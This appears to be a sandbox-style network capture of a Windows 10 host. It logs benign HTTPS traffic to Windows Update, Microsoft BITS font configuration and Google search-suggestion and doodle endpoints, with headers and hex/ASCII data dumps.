Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.17	49710	4.175.87.197	443

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:40:53 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=2bKyk+phhzcxLy4&MD=VEcd6h4b HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-09-26 15:40:54 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: ff58fcee-3c4f-4e5a-9fba-1abf03ec1c16 MS-RequestId: eb1fe82f-8e45-42e1-b1f1-215e416f752b MS-CV: +yKjjdjhZ0i+Gu/K.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Thu, 26 Sep 2024 15:40:53 GMT Connection: close Content-Length: 24490
2024-09-26 15:40:54 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-09-26 15:40:54 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.17	49715	184.28.90.27	443

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:41:03 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-09-26 15:41:03 UTC	466	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF67) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-weu-z1 Cache-Control: public, max-age=90311 Date: Thu, 26 Sep 2024 15:41:03 GMT Connection: close X-CID: 2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.17	49716	184.28.90.27	443

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:41:04 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-09-26 15:41:05 UTC	514	IN	HTTP/1.1 200 OK ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF06) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-weu-z1 Cache-Control: public, max-age=90256 Date: Thu, 26 Sep 2024 15:41:04 GMT Content-Length: 55 Connection: close X-CID: 2
2024-09-26 15:41:05 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.17	49717	142.250.185.132	443	6452	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:41:23 UTC	635	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CJC2yQEIprbJAQipncoBCLf3ygEIkqHLAQiFoM0BCNy9zQEIkcrNAQi5ys0BCLbLzQEI6dLNAQiK080BCMHUzQEIz9bNAQjj1s0BCI7XzQEIp9jNAQi62M0BCPnA1BUYuL/NARj2yc0BGOuNpRc= Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-09-26 15:41:23 UTC	1266	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 15:41:23 GMT Pragma: no-cache Expires: -1 Cache-Control: no-cache, must-revalidate Content-Type: text/javascript; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-_SM0zCeElYPxCf_8WHLvIw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-09-26 15:41:23 UTC	124	IN	Data Raw: 63 36 35 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 70 61 73 74 6f 72 20 73 74 65 76 65 20 6c 61 77 73 6f 6e 20 63 68 75 72 63 68 22 2c 22 77 6f 6c 66 67 61 6e 67 20 61 6d 61 64 65 75 73 20 6d 6f 7a 61 72 74 22 2c 22 6c 6f 74 74 65 72 79 20 6d 65 67 61 20 6d 69 6c 6c 69 6f 6e 73 20 70 6f 77 65 72 62 61 6c 6c 20 6a 61 63 6b 70 6f 74 22 2c 22 6a 61 6c 65 6e 20 68 61 72 61 6c Data Ascii: c65)]}'["",["pastor steve lawson church","wolfgang amadeus mozart","lottery mega millions powerball jackpot","jalen haral
2024-09-26 15:41:23 UTC	1390	IN	Data Raw: 73 6f 6e 20 62 61 73 6b 65 74 62 61 6c 6c 22 2c 22 63 6f 6d 65 74 20 61 33 20 74 73 75 63 68 69 6e 73 68 61 6e 20 61 74 6c 61 73 22 2c 22 6e 69 6e 74 65 6e 64 6f 20 7a 65 6c 64 61 20 65 63 68 6f 65 73 20 6f 66 20 77 69 73 64 6f 6d 22 2c 22 68 75 72 72 69 c3 a7 61 6e 65 20 68 65 6c 65 6e 65 20 66 6c 6f 72 69 64 61 22 2c 22 61 69 72 20 6a 6f 72 64 61 6e 20 31 20 74 72 61 76 69 73 20 73 63 6f 74 74 20 6d 65 64 69 75 6d 20 6f 6c 69 76 65 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 Data Ascii: son basketball","comet a3 tsuchinshan atlas","nintendo zelda echoes of wisdom","hurriane helene florida","air jordan 1 travis scott medium olive"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SE
2024-09-26 15:41:23 UTC	1390	IN	Data Raw: 56 71 52 6e 52 57 4f 47 31 32 54 46 64 4f 64 6d 4e 7a 53 30 51 33 55 31 5a 77 54 7a 52 56 53 6e 46 54 5a 47 55 30 5a 6b 67 79 5a 48 49 79 4d 6a 46 31 4d 6a 4e 50 61 44 64 53 63 57 46 4c 54 6d 5a 46 54 45 73 7a 56 31 4a 55 57 6e 4e 4f 56 7a 6b 76 59 6b 39 46 4f 57 70 78 52 30 5a 30 63 6c 56 72 52 30 4e 53 63 56 49 76 61 57 78 79 4e 47 6b 31 57 48 6f 7a 65 58 4a 55 65 55 4d 7a 56 6d 46 35 62 44 42 47 53 47 4e 77 56 47 74 55 51 55 64 33 51 55 68 4f 56 46 52 6b 65 54 5a 4c 59 32 4e 59 52 31 42 61 54 57 4a 6f 61 30 70 54 56 54 5a 68 53 30 74 61 4f 56 6c 4e 56 56 42 6a 55 6a 4a 74 61 56 4e 57 51 6e 64 32 56 46 42 72 53 33 41 35 63 58 70 50 62 7a 52 50 4f 56 42 70 65 45 56 73 57 6e 6c 68 51 57 74 72 4f 47 4a 56 5a 56 52 75 54 47 78 34 62 31 63 33 51 33 5a 44 4d Data Ascii: VqRnRWOG12TFdOdmNzS0Q3U1ZwTzRVSnFTZGU0ZkgyZHIyMjF1MjNPaDdScWFLTmZFTEszV1JUWnNOVzkvYk9FOWpxR0Z0clVrR0NScVIvaWxyNGk1WHozeXJUeUMzVmF5bDBGSGNwVGtUQUd3QUhOVFRkeTZLY2NYR1BaTWJoa0pTVTZhS0taOVlNVVBjUjJtaVNWQnd2VFBrS3A5cXpPbzRPOVBpeEVsWnlhQWtrOGJVZVRuTGx4b1c3Q3ZDM
2024-09-26 15:41:23 UTC	276	IN	Data Raw: 65 3a 73 75 67 67 65 73 74 72 65 6c 65 76 61 6e 63 65 22 3a 5b 31 32 35 37 2c 31 32 35 36 2c 31 32 35 35 2c 31 32 35 34 2c 31 32 35 33 2c 31 32 35 32 2c 31 32 35 31 2c 31 32 35 30 5d 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 73 75 62 74 79 70 65 73 22 3a 5b 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 5d 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 74 79 70 65 22 3a 5b 22 51 55 45 52 59 22 2c 22 45 4e 54 49 54 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 Data Ascii: e:suggestrelevance":[1257,1256,1255,1254,1253,1252,1251,1250],"google:suggestsubtypes":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],"google:suggesttype":["QUERY","ENTITY","QUERY","QUERY","QUERY","QUERY"
2024-09-26 15:41:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.17	49718	142.250.185.132	443	6452	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:41:23 UTC	353	OUT	GET /async/ddljson?async=ntp:2 HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-09-26 15:41:23 UTC	1042	IN	HTTP/1.1 200 OK Version: 677663421 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Thu, 26 Sep 2024 15:41:23 GMT Server: gws Cache-Control: private X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-09-26 15:41:23 UTC	348	IN	Data Raw: 65 62 37 0d 0a 29 5d 7d 27 0a 7b 22 64 64 6c 6a 73 6f 6e 22 3a 7b 22 61 63 63 65 73 73 69 62 69 6c 69 74 79 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 22 2c 22 61 6c 74 5f 74 65 78 74 22 3a 22 43 65 6c 65 62 72 61 74 69 6e 67 20 50 6f 70 63 6f 72 6e 22 2c 22 63 74 61 5f 64 61 74 61 5f 75 72 69 22 3a 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 61 77 41 41 41 44 49 43 41 4d 41 41 41 43 44 42 43 56 6d 41 41 41 44 41 46 42 4d 56 45 55 41 41 41 44 44 68 34 4a 75 46 7a 39 56 4a 6c 65 68 4d 44 2f 54 61 43 36 59 47 79 37 42 55 6b 62 69 66 69 64 35 43 79 65 4a 44 54 41 36 42 44 2b 45 42 79 77 39 41 55 41 79 42 7a 67 74 42 30 49 74 44 6b 59 34 43 6b 68 43 42 6b 68 Data Ascii: eb7)]}'{"ddljson":{"accessibility_description":"","alt_text":"Celebrating Popcorn","cta_data_uri":"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAawAAADICAMAAACDBCVmAAADAFBMVEUAAADDh4JuFz9VJlehMD/TaC6YGy7BUkbifid5CyeJDTA6BD+EByw9AUAyBzgtB0ItDkY4CkhCBkh
2024-09-26 15:41:23 UTC	1390	IN	Data Raw: 52 69 76 75 6a 41 6d 6e 4c 54 48 63 65 68 70 56 48 52 31 66 48 41 78 70 48 67 4e 30 48 43 65 39 51 53 79 59 47 6a 6e 71 62 41 31 69 46 77 42 68 4a 52 6c 6a 48 79 4e 67 4d 45 4a 61 51 56 5a 62 50 58 5a 63 51 48 32 4d 49 44 74 67 4c 79 76 30 6f 42 62 6d 68 68 7a 46 54 69 37 4a 56 43 36 6b 56 55 52 79 4a 77 52 63 45 51 44 4c 57 6a 46 37 4d 41 65 69 53 78 57 36 58 78 33 73 6c 69 62 4b 64 69 4f 50 52 42 48 75 6d 69 6a 77 6f 43 79 75 56 68 71 4a 50 41 50 4f 59 54 4c 52 61 44 50 44 63 69 50 56 62 7a 56 71 55 46 74 69 52 49 6e 54 66 51 6d 75 58 51 66 30 72 52 37 59 64 6a 65 5a 52 7a 4f 46 4e 67 2f 31 74 41 4b 32 66 43 4b 56 56 78 76 62 66 6a 6a 6b 64 69 6a 36 78 68 54 36 78 7a 48 65 70 54 54 43 69 79 62 75 67 69 7a 67 68 7a 71 45 77 4f 5a 75 6e 74 52 75 66 36 44 Data Ascii: RivujAmnLTHcehpVHR1fHAxpHgN0HCe9QSyYGjnqbA1iFwBhJRljHyNgMEJaQVZbPXZcQH2MIDtgLyv0oBbmhhzFTi7JVC6kVURyJwRcEQDLWjF7MAeiSxW6Xx3slibKdiOPRBHumijwoCyuVhqJPAPOYTLRaDPDciPVbzVqUFtiRInTfQmuXQf0rR7YdjeZRzOFNg/1tAK2fCKVVxvbfjjkdij6xhT6xzHepTTCiybugizghzqEwOZuntRuf6D
2024-09-26 15:41:23 UTC	1390	IN	Data Raw: 4d 77 2b 37 77 35 43 57 4a 2b 6b 58 6b 71 43 2b 64 76 57 51 5a 43 49 6a 73 4a 52 6b 75 62 6f 56 31 72 71 7a 76 5a 56 70 54 6e 56 48 57 75 65 74 64 51 65 64 32 30 4b 31 56 62 57 56 6c 36 51 47 64 4e 4f 61 33 54 4e 64 56 42 47 41 7a 41 5a 2f 2b 74 51 4b 4e 57 53 38 6a 73 36 2f 33 66 33 69 6d 6b 4a 4d 68 67 79 7a 4d 66 7a 75 71 47 66 51 6b 45 71 37 73 41 6a 5a 32 48 5a 68 39 6a 67 79 6b 2b 4f 46 2b 4e 33 57 72 32 43 6d 56 54 2f 41 41 53 41 74 4c 41 57 75 6a 47 41 34 4f 4e 4b 57 5a 70 49 59 64 77 6e 38 4f 7a 30 42 58 6a 49 57 64 59 6b 69 47 43 39 53 6e 44 53 75 41 30 64 75 54 38 70 35 2f 71 66 41 57 31 59 45 33 55 65 47 76 58 77 67 4a 6e 35 39 52 65 5a 69 44 4d 48 33 2f 58 46 62 35 4f 5a 68 2b 74 54 4b 53 79 6f 61 59 36 70 70 45 43 4c 54 45 68 62 54 79 4f 63 Data Ascii: Mw+7w5CWJ+kXkqC+dvWQZCIjsJRkuboV1rqzvZVpTnVHWuetdQed20K1VbWVl6QGdNOa3TNdVBGAzAZ/+tQKNWS8js6/3f3imkJMhgyzMfzuqGfQkEq7sAjZ2HZh9jgyk+OF+N3Wr2CmVT/AASAtLAWujGA4ONKWZpIYdwn8Oz0BXjIWdYkiGC9SnDSuA0duT8p5/qfAW1YE3UeGvXwgJn59ReZiDMH3/XFb5OZh+tTKSyoaY6ppECLTEhbTyOc
2024-09-26 15:41:23 UTC	646	IN	Data Raw: 70 61 72 6d 65 52 78 7a 42 2b 2b 61 41 4b 78 51 46 31 66 76 30 62 79 6a 45 71 52 5a 59 54 4f 62 72 56 59 72 65 33 2b 2b 43 4c 78 31 53 35 31 38 72 4c 6f 72 47 4e 6f 6d 35 64 4a 54 49 79 78 6f 6b 59 75 50 6a 37 6c 30 37 62 58 53 57 64 41 31 4b 2b 44 36 45 62 68 64 68 33 64 5a 59 7a 38 55 48 77 73 37 4a 51 77 63 61 68 57 66 6b 4d 41 6c 6b 77 38 34 64 55 50 75 4c 79 6d 6c 4f 59 6c 31 6a 34 45 76 6c 62 67 65 32 4a 30 51 30 75 72 34 44 35 4f 74 6b 30 56 61 6e 5a 32 66 58 31 78 63 53 71 37 6b 35 65 4c 38 62 4b 5a 65 58 4c 64 4d 68 32 6d 32 48 57 53 6e 72 4a 42 53 48 64 73 6a 71 38 50 36 64 79 6c 52 4c 6f 30 50 31 6a 73 77 43 7a 49 6f 46 74 64 69 65 52 66 32 39 4d 61 59 52 46 36 4f 2f 48 57 68 41 71 56 55 74 41 6f 6a 7a 47 63 6c 46 65 49 32 65 4d 66 62 56 70 4e Data Ascii: parmeRxzB++aAKxQF1fv0byjEqRZYTObrVYre3++CLx1S518rLorGNom5dJTIyxokYuPj7l07bXSWdA1K+D6Ebhdh3dZYz8UHws7JQwcahWfkMAlkw84dUPuLymlOYl1j4Evlbge2J0Q0ur4D5Otk0VanZ2fX1xcSq7k5eL8bKZeXLdMh2m2HWSnrJBSHdsjq8P6dylRLo0P1jswCzIoFtdieRf29MaYRF6O/HWhAqVUtAojzGclFeI2eMfbVpN
2024-09-26 15:41:23 UTC	167	IN	Data Raw: 61 31 0d 0a 79 50 66 44 39 54 6e 2b 42 73 42 43 41 6d 4c 4a 39 31 47 73 67 46 51 7a 32 79 6d 66 61 46 76 75 70 70 77 4b 79 77 73 34 48 6c 65 34 49 35 48 50 35 49 7a 6f 31 51 7a 72 33 7a 52 6c 74 39 54 4c 37 39 65 2b 5a 70 6d 4f 52 71 2f 59 68 41 65 77 74 70 2f 79 6f 70 5a 4c 52 30 62 59 71 7a 4b 52 36 6c 67 79 45 41 72 4c 68 51 4d 5a 69 31 43 55 49 64 43 53 35 42 4e 45 79 56 43 39 6b 63 56 53 72 70 61 52 4b 46 62 6f 73 4d 71 72 75 35 6a 2f 62 69 69 31 51 36 68 61 72 68 74 30 43 2b 45 57 34 0d 0a Data Ascii: a1yPfD9Tn+BsBCAmLJ91GsgFQz2ymfaFvuppwKyws4Hle4I5HP5Izo1Qzr3zRlt9TL79e+ZpmORq/YhAewtp/yopZLR0bYqzKR6lgyEArLhQMZi1CUIdCS5BNEyVC9kcVSrpaRKFbosMqru5j/bii1Q6harht0C+EW4
2024-09-26 15:41:23 UTC	1390	IN	Data Raw: 35 34 39 35 0d 0a 2b 44 31 77 56 37 70 77 6a 4c 46 65 76 4c 53 42 43 74 31 37 66 4b 70 64 45 52 37 4c 7a 55 68 52 33 56 55 43 4b 39 34 34 39 43 42 53 39 57 4a 36 54 67 74 2b 77 75 54 79 63 31 2f 6a 6d 70 30 50 42 6f 6f 68 57 61 51 2b 55 6b 6e 4e 6f 34 73 48 38 6c 6e 61 62 65 77 4a 61 53 56 69 64 7a 54 6d 46 45 67 33 78 6d 74 49 6c 55 74 6d 47 6f 68 41 57 74 31 51 43 76 43 7a 2b 43 51 6d 50 68 2f 59 33 6c 61 2f 6b 35 44 45 68 30 71 46 69 5a 41 72 46 2b 48 74 62 67 32 4f 42 70 63 52 49 67 51 65 66 53 6a 56 42 49 54 45 51 70 55 32 69 70 49 49 66 31 63 43 47 35 46 41 75 64 42 57 35 4a 56 30 38 36 47 65 4b 2f 4c 63 43 53 78 58 48 48 4a 6c 57 69 31 6a 74 79 33 78 6f 73 51 73 6c 57 4b 55 73 75 32 4b 6c 6f 56 4c 52 79 63 5a 58 5a 72 73 55 30 55 59 39 70 79 74 4a Data Ascii: 5495+D1wV7pwjLFevLSBCt17fKpdER7LzUhR3VUCK9449CBS9WJ6Tgt+wuTyc1/jmp0PBoohWaQ+UknNo4sH8lnabewJaSVidzTmFEg3xmtIlUtmGohAWt1QCvCz+CQmPh/Y3la/k5DEh0qFiZArF+Htbg2OBpcRIgQefSjVBITEQpU2ipIIf1cCG5FAudBW5JV086GeK/LcCSxXHHJlWi1jty3xosQslWKUsu2KloVLRycZXZrsU0UY9pytJ
2024-09-26 15:41:23 UTC	1390	IN	Data Raw: 76 53 33 6e 41 71 31 2b 47 68 52 56 72 6c 63 76 6c 32 70 46 76 6a 4f 78 36 41 45 43 71 58 67 51 62 30 71 55 46 6c 57 71 6d 68 79 4a 34 35 55 4f 79 46 34 4c 34 6d 5a 76 79 7a 4c 48 38 71 72 71 4d 55 48 44 4d 65 72 63 31 44 50 35 37 35 45 68 79 4b 76 34 33 55 77 48 6b 69 52 37 6d 4c 67 5a 45 45 69 45 6f 35 56 79 55 67 6d 44 62 32 55 69 49 41 46 79 30 56 67 75 49 67 72 62 49 57 2f 45 4b 59 49 67 78 58 7a 56 38 44 43 4b 36 51 53 73 61 68 55 47 66 6f 39 4d 6a 70 57 4c 57 67 77 59 53 57 69 36 6d 79 43 67 6b 65 67 55 71 38 4c 56 4e 44 37 63 59 41 69 70 34 6c 77 69 4d 62 41 58 6c 74 51 79 69 4b 74 6f 46 66 42 2b 45 6c 59 55 61 6d 51 36 39 6b 54 63 61 4e 46 57 79 33 35 70 5a 4b 51 45 39 76 6c 68 76 4c 4a 79 61 6e 70 46 39 72 4e 52 42 51 73 30 6c 4a 4a 53 30 55 72 Data Ascii: vS3nAq1+GhRVrlcvl2pFvjOx6AECqXgQb0qUFlWqmhyJ45UOyF4L4mZvyzLH8qrqMUHDMerc1DP575EhyKv43UwHkiR7mLgZEEiEo5VyUgmDb2UiIAFy0VguIgrbIW/EKYIgxXzV8DCK6QSsahUGfo9MjpWLWgwYSWi6myCgkegUq8LVND7cYAip4lwiMbAXltQyiKtoFfB+ElYUamQ69kTcaNFWy35pZKQE9vlhvLJyanpF9rNRBQs0lJJS0Ur
2024-09-26 15:41:23 UTC	1390	IN	Data Raw: 4e 34 57 32 77 6a 57 56 70 46 33 63 72 45 45 68 4d 68 44 7a 76 63 55 69 4b 71 56 6f 78 67 33 63 4c 4b 61 59 53 47 59 35 48 59 70 4e 54 30 32 70 30 57 47 68 4a 4d 46 4f 72 42 37 64 65 62 59 6a 51 2b 6f 76 47 57 44 56 32 71 57 51 4d 72 41 4b 70 4a 61 32 73 4b 5a 52 51 44 30 73 71 53 4c 45 56 54 71 6e 2f 75 42 32 57 65 5a 4a 6d 38 62 4b 4e 78 59 75 67 42 31 62 35 73 62 62 73 31 64 39 32 49 78 6d 74 52 4c 76 75 4e 36 33 61 4b 45 79 46 37 4f 31 38 2f 7a 58 70 4a 4b 6a 2b 50 61 4e 69 73 2f 76 6d 70 75 5a 56 64 49 53 35 62 6d 31 59 31 6d 73 76 48 57 36 30 49 64 4a 4c 63 78 6c 59 39 71 31 6b 67 4f 55 76 4d 46 35 56 61 51 50 72 58 67 6c 6c 55 6b 6b 70 55 4f 32 71 74 34 6b 6c 75 46 69 72 33 6a 59 57 6f 72 6d 46 6c 57 32 73 33 58 52 52 50 6f 44 57 75 2b 69 57 32 38 Data Ascii: N4W2wjWVpF3crEEhMhDzvcUiKqVoxg3cLKaYSGY5HYpNT02p0WGhJMFOrB7debYjQ+ovGWDV2qWQMrAKpJa2sKZRQD0sqSLEVTqn/uB2WeZJm8bKNxYugB1b5sbbs1d92IxmtRLvuN63aKEyF7O18/zXpJKj+PaNis/vmpuZVdIS5bm1Y1msvHW60IdJLcxlY9q1kgOUvMF5VaQPrXgllUkkpUO2qt4kluFir3jYWormFlW2s3XRRPoDWu+iW28
